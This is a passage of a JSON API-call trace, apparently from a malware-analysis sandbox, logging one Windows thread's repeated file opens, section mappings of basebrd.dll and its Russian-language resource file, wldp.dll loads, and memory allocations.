            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x0000032c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\Branding\\Basebrd\\basebrd.dll"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 101
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000300"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0016a000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 102
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "RegionSize",
                "value": "0x0016a000"
              }
            ],
            "repeated": 0,
            "id": 103
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000300"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\Branding\\Basebrd\\basebrd.dll"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 104
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x0000032c"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0016a000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 105
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x0000032c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\Branding\\Basebrd\\ru-RU\\Basebrd.dll.mui"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 106
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000300"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c090000"
              },
              {
                "name": "SectionOffset",
                "value": "0x3f6827b300"
              },
              {
                "name": "ViewSize",
                "value": "0x00003000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 107
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\wldp"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee0500000"
              }
            ],
            "repeated": 0,
            "id": 108
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "wldp.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0500000"
              }
            ],
            "repeated": 0,
            "id": 109
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba25000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 110
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "unload"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\wldp"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee0500000"
              }
            ],
            "repeated": 0,
            "id": 111
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0500000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              }
            ],
            "repeated": 0,
            "id": 112
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c090000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              }
            ],
            "repeated": 0,
            "id": 113
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "RegionSize",
                "value": "0x0016a000"
              }
            ],
            "repeated": 0,
            "id": 114
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba27000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 115
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x0000032c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\Branding\\Basebrd\\basebrd.dll"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 116
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000300"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0016a000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 117
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "RegionSize",
                "value": "0x0016a000"
              }
            ],
            "repeated": 0,
            "id": 118
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000300"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\Branding\\Basebrd\\basebrd.dll"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 119
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x0000032c"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0016a000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 120
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x0000032c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\Branding\\Basebrd\\ru-RU\\Basebrd.dll.mui"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 121
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000300"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c090000"
              },
              {
                "name": "SectionOffset",
                "value": "0x3f6827b300"
              },
              {
                "name": "ViewSize",
                "value": "0x00003000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 122
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\wldp"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee0500000"
              }
            ],
            "repeated": 0,
            "id": 123
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "wldp.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0500000"
              }
            ],
            "repeated": 0,
            "id": 124
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "unload"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\wldp"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee0500000"
              }
            ],
            "repeated": 0,
            "id": 125
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0500000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              }
            ],
            "repeated": 0,
            "id": 126
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c090000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              }
            ],
            "repeated": 0,
            "id": 127
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "RegionSize",
                "value": "0x0016a000"
              }
            ],
            "repeated": 0,
            "id": 128
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x0000032c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "no"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 129
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba29000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 130
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x0000032c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\Branding\\Basebrd\\basebrd.dll"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 131
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000300"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0016a000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 132
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "RegionSize",
                "value": "0x0016a000"
              }
            ],
            "repeated": 0,
            "id": 133
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000300"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\Branding\\Basebrd\\basebrd.dll"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 134
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x0000032c"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0016a000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 135
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x0000032c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\Branding\\Basebrd\\ru-RU\\Basebrd.dll.mui"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 136
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000300"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c090000"
              },
              {
                "name": "SectionOffset",
                "value": "0x3f6827bbf0"
              },
              {
                "name": "ViewSize",
                "value": "0x00003000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 137
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\wldp"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee0500000"
              }
            ],
            "repeated": 0,
            "id": 138
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "wldp.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0500000"
              }
            ],
            "repeated": 0,
            "id": 139
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "unload"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\wldp"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee0500000"
              }
            ],
            "repeated": 0,
            "id": 140
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0500000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              }
            ],
            "repeated": 0,
            "id": 141
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c090000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              }
            ],
            "repeated": 0,
            "id": 142
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "RegionSize",
                "value": "0x0016a000"
              }
            ],
            "repeated": 0,
            "id": 143
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x0000032c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\Branding\\Basebrd\\basebrd.dll"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
